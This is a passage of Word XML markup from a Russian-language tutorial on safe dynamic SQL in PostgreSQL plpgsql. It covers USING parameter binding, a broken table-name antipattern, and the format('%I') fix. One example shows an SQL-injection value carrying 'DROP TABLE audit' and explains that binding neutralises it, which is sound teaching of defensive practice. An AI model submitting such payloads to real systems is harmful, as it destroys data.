          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP 422</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если даже бы прошло через FastAPI, в plpgsql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING $2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>, не SQL-text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9F947" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Внутри функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCF8DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT to_jsonb(t) FROM "users" AS t WHERE t.id = $1 AND t.created_at &gt;= $2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344397CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING 1, '2024-01-01;DROP TABLE audit;--'::date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022FCFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ $2 — это value, не SQL → ERROR: invalid input syntax for type date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79508997" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>PostgreSQL type-coerce падает с syntax error, но НЕ исполняет injected SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB6696" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Попытка использовать USING для identifier — НЕ работает</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B3E5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- АНТИПАТТЕРН: попытка USING для имени таблицы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207466A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.broken_find(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91F718"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76C12DEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BF7F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE 'SELECT * FROM $1' USING tbl_name;  -- ← БУГ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234F6AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E8485A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C880D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6C2F04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- При вызове:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54938E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM app.broken_find('users') AS t(id int);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD8607" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ERROR: syntax error at or near "$1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB9369" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- LINE 1: SELECT * FROM $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52E6F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--                       ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D73073D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL parser не позволяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в FROM-clause — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>value-placeholder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а FROM ожидает identifier. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>то же ограничение</w:t>
      </w:r>
      <w:r>
        <w:t>, что в application-Wire-Protocol: bind работает только в expression-position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9AA58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Корректный путь — комбинировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для имени и USING для значений:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F38BD1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ПРАВИЛЬНО: %I для identifier + USING для values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC2F37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.proper_find(tbl_name text, search text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C52D6"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1AB286FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0F73E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3049D7DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT * FROM %I WHERE name = $1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB5164" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        tbl_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E38D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) USING search;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6EC24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDF3BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BE775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Использование USING — детали</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB58E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USING принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary number of values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, привязанных к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ..., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в SQL-string. Типы выводятся PostgreSQL из declared signature функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через явные CAST в SQL-string:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DB256" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Implicit type из function signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF7E2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM t WHERE id = $1 AND active = $2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557BA78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING row_id, is_active;  -- row_id: int, is_active: boolean (from declaration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019963B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74922576" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Explicit cast в SQL для безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4077F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTE 'SELECT * FROM t WHERE id = $1::int AND created_at &gt;= $2::date'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06905A3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING row_id, since_str;  -- cast гарантирует type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE2E4D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Explicit cast (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defence-in-depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: даже если caller передал wrong-type, SQL-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принудит type или упадёт с invalid input syntax (что желательно — лучше падать, чем silently ошибочный поиск).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D714680" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не поддерживает identifier даже через CAST</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA59DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- НЕ РАБОТАЕТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B466A6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM $1::regclass' USING tbl_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D83BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ERROR: syntax error at or near "$1" (regclass всё равно identifier-context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63763F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируется как «значение типа regclass» — это oid идентификатора таблицы, не имя. Если caller передаст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'users'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cast-нет text → regclass (lookup oid таблицы), и SQL станет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM &lt;oid_of_users&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>работает в WHERE-position</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (regclass — value-type), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не в FROM-position</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (FROM ожидает identifier-token).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC3C82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
